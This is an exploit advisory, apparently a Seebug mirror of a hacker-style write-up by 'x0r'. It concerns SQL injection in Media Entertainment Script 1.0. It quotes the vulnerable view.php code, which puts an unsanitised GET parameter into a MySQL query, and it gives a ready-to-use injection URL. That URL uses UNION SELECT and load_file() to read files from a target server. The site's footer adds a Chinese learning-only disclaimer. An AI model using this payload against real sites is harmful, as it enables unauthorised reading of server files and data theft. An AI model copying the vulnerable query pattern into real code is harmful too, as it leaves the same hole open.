######################################################################################### [0x01] Informations: Name : Media Entertainment Script 1.0 Download : http://www.hotscripts.com/listings/jump/download/89424/ Vulnerability : Sql Injection To Lfi Author : x0r Contact : andry2000@hotmail.it Notes : Proud To Be Italian Greetz : // ######################################################################################### [0x02] Bug: Bugged file is /[path]/view.php [code] $id = $_GET[\'id\']; $v = mysql_fetch_array(mysql_query(\"SELECT id,views,title FROM videos WHERE id=\'$id\'\")); [/code] ######################################################################################### [0x03] Exploit: 1- http://victim.it/path/view.php?id=-1\' union select 0,0,0,load_file(\'lf\'),0,0,0-- ########################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论